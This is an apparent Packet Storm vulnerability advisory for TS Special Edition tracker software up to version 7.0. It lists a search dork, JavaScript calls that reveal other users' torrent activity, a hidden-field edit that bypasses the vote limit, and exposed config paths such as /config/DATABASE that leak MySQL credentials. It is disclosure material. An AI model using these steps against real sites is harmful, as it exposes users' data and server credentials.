TS Special Edition versions 7.0 and below suffer from multiple disclosure vulnerabilities.
a8f644205955ebcb8f55e9fd34e72fb520b99c78fdc7c8ba13630a092451e3ab
##############################################################################################
#
# TS Special Edition <= v.7.0 Multiple Vulnerabilities
# Dork: "Powered by TS Special Edition"
# Site: http://templateshares.net
# Download: http://templateshares.net/special/purchase
# Reported on 02/05/2010
#
# Author: IHTeam
#
##############################################################################################
#
# See any seed/leech files of any users
#
# 1) Open any userdatail you want (Ex: /userdetails.php?id=1)
# 2) Paste in url bar this code for:
# 2.1) javascript:TSAjaxRequest('showuploaded'); <---- See Uploaded Torrent
# 2.2) javascript:TSAjaxRequest('showcompleted'); <---- See Completed
Torrent
# 2.3) javascript:TSAjaxRequest('showleechs'); <---- See In Leech
Torrents
# 2.4) javascript:TSAjaxRequest('showseeds'); <---- See In Seed Torrents
# 2.5) javascript:TSAjaxRequest('showsnatches'); <---- See Recently
Downloaded
#
##############################################################################################
#
# Bypass Vote System
#
# 1) Open any torrent file datail (Ex: /details.php?id=1)
# 2) Edit HTML Source code with FireBug or Opera
# 3) Search 'form id="quickrate"' and edit these information:
# 3.1) <input type="hidden" value="CHAGE_YOUR_ID_HERE" name="userid">
# 3.2) javascript:TSQuickRate('torrent_1', 'CHAGE_YOUR_ID_HERE');
# 4) Apply changes and vote the torrent every time you want
#
##############################################################################################
#
# MySQL Credential
#
# You can see MySQL Credential by opening /config/DATABASE
#
# Ex: www.mysite.com/config/DATABASE
#
a:4:{s:10:"mysql_host";s:9:"HOSTNAME_OF_MYSQL_DATABASE";s:10:"mysql_user";s:11:"USERNAME_OF_MYSQL"
#
;s:10:"mysql_pass";s:10:"PASSWORD_OF_MYSQL";s:8:"mysql_db";s:21:"DATABASE_NAME";}
#
# It can be fixed adding .htaccess in /config/ directory
##############################################################################################
#
# Others configuration files
#
# 1) /config/WAITSLOT
# 2) /config/TWEAK
# 3) /config/THEME
# 4) /config/STAFFTEAM
# 5) /config/SMTP
# 6) /config/SEO
# 7) /config/SECURITY
# 8) /config/REDIRECT
# 9) /config/PJIRC
# 10) /config/PAYPAL
# 11) /config/MAIN
# 12) /config/KPS
# 13) /config/FORUMCP
# 14) /config/EXTRA
# 15) /config/DATETIME
# 16) /config/CLEANUP
# 17) /pjirc/pjirc.cfg
#
##############################################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed